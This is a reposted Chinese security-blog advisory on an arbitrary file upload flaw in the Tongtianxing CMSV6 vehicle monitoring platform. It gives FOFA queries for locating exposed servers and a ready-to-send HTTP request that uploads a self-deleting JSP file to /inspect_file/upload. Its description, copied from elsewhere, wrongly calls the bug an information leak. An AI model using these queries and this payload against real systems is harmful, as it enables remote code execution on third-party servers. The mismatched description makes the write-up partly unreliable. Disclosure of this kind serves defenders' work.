通天星-CMSV6-inspect_file-upload存在任意文件上传漏洞

admin 2024年4月1日10:47:01评论63 views字数 1203阅读4分0秒阅读模式

前言

鸿运主动安全监控云平台实现对计算资源、存储资源、网络资源、云应用服务进行7*24小时全时区、多地域、全方位、立体式、智能化的IT运维监控,保障IT系统安全、稳定、可靠运行。鸿运(通天星CMSV6车载)主动安全监控云平台存在敏感信息泄露漏洞。

通天星-CMSV6-inspect_file-upload存在任意文件上传漏洞

一、系统简介

鸿运(通天星CMSV6车载)主动安全监控云平台实现对计算资源、存储资源、网络资源、云应用服务进行7*24小时全时区、多地域、全方位、立体式、智能化的IT运维监控,保障IT系统安全、稳定、可靠运行。

二、漏洞描述

鸿运主动安全监控云平台实现对计算资源、存储资源、网络资源、云应用服务进行7*24小时全时区、多地域、全方位、立体式、智能化的IT运维监控,保障IT系统安全、稳定、可靠运行。鸿运(通天星CMSV6车载)主动安全监控云平台存在敏感信息泄露漏洞。

三、漏洞复现

fofa

body="./open/webApi.html"||body="/808gps/"
poc
POST /inspect_file/upload HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Accept: */*content-Length: 238Content-Type: multipart/form-data;boundary=-----------------------------7db372eb000e2-----------------------------7db372eb000e2Content-Disposition: form-data; name="uploadFile"; filename="1.jsp"Content-Type: application/octet-stream<% out.println(111*111);new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>-----------------------------7db372eb000e2--

通天星-CMSV6-inspect_file-upload存在任意文件上传漏洞

通天星-CMSV6-inspect_file-upload存在任意文件上传漏洞

公众号技术文章仅供诸位网络安全工程师对自己所管辖的网站、服务器、网络进行检测或维护时参考用,公众号的检测工具仅供各大安全公司的安全测试员安全测试使用。未经允许请勿利用文章里的技术资料对任何外部计算机系统进行入侵攻击,公众号的各类工具均不得用于任何非授权形式的安全测试。公众号仅提供技术交流,不对任何成员利用技术文章或者检测工具造成任何理论上的或实际上的损失承担责任。

原文始发于微信公众号(TKing的安全圈):通天星-CMSV6-inspect_file-upload存在任意文件上传漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月1日10:47:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   通天星-CMSV6-inspect_file-upload存在任意文件上传漏洞https://cn-sec.com/archives/2618775.html

发表评论

匿名网友 填写信息